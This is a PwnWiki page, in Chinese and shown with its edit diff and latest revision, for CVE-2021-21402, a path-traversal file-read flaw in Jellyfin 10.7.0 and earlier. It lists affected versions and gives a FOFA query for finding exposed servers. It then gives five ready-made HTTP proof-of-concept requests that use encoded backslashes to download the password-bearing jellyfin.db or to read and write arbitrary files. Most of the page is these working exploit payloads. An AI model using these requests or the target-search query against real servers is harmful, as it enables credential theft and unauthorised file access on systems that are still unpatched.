Difference between revisions of "CVE-2021-21402 Jellyfin 任意文件讀取漏洞"
From PwnWiki
(Created page with "<languages /> <translate> ==影響版本== </translate> <pre> jellyfin<=10.7.0 </pre> ==FOFA== <pre> title="Jellyfin" </pre> ==POC1== <translate> 從服務器下載帶...") |
(Marked this version for translation) |
||
| Line 2: | Line 2: | ||
<translate> | <translate> | ||
| − | ==影響版本== | + | ==影響版本== <!--T:1--> |
</translate> | </translate> | ||
| Line 17: | Line 17: | ||
==POC1== | ==POC1== | ||
<translate> | <translate> | ||
| + | <!--T:2--> | ||
從服務器下載帶有密碼的<code>jellyfin.db</code> | 從服務器下載帶有密碼的<code>jellyfin.db</code> | ||
</translate> | </translate> | ||
| Line 42: | Line 43: | ||
==POC4== | ==POC4== | ||
<translate> | <translate> | ||
| + | <!--T:3--> | ||
要下載的POC <code>c:tempfilename.jpg</code> | 要下載的POC <code>c:tempfilename.jpg</code> | ||
</translate> | </translate> | ||
Latest revision as of 12:04, 8 April 2021
影響版本
jellyfin<=10.7.0
FOFA
title="Jellyfin"
POC1
從服務器下載帶有密碼的jellyfin.db
GET /Audio/anything/hls/..%5Cdata%5Cjellyfin.db/stream.mp3/ HTTP/1.1 Host: x.x.x.x accept: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Referer: http://x.x.x.x/web/index.html Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close
POC2
GET /Videos/anything/hls/m/..%5Cdata%5Cjellyfin.db HTTP/1.1
POC3
GET /Videos/anything/hls/..%5Cdata%5Cjellyfin.db/stream.m3u8/?api_key=4c5750626da14b0a804977b09bf3d8f7 HTTP/1.1
POC4
要下載的POC c:tempfilename.jpg
GET /Images/Ratings/c:%5ctemp/filename HTTP/1.1 GET /Images/Ratings/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5ctemp/filename HTTP/1.1
POC5
POST /Videos/d7634eb0064cce760f3f0bf8282c16cd/Subtitles HTTP/1.1
...
X-Emby-Authorization: MediaBrowser DeviceId="...", Version="10.7.0", Token="..."
...
{"language":".\..\","format":".\..\test.bin","isForced":false,"data":"base64 encoded data"}